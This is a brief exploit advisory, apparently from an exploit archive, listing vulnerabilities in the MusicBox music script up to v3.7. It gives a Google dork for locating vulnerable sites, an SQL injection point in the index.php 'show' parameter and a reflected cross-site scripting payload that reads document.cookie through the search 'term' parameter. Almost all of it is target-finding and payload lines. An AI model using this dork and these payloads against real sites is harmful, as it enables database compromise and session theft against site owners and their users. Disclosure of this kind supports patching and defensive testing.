1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
============================================================ MusicBox <= v3.7 Multiple Vulnerabilities ============================================================ [~] Author : R@1D3N (amin emami) [~] Software Link : www.musicboxv2.com [~] Price : $275 [~] Version : v3.7 and previous versions [~] Contact : aminrayden@yahoo.com <~ [~] DorK : inurl:genre_artists.php [~] Forum : http://ashiyane.org/forums/ [~] Greetz :ItSecTeam, Inj3ct0r, Exploit-db [~] Tested on: Windows XP Sp3 vul1.sql injection: /[Path]/index.php?action=top&type=Songs&show=10'[ SQL ATTACK] Vul2.Cross site Scripting: /[path]/index.php?in=song&term="><script>alert(document.cookie)<%2Fscript>&action=search&start=0 |